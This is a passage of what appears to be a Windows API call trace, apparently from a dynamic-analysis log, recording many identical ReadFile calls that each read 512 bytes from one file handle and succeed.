lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, 
lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, 
lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile 
(in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 
[0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, 
lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, 
lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: 
lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, 
lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, 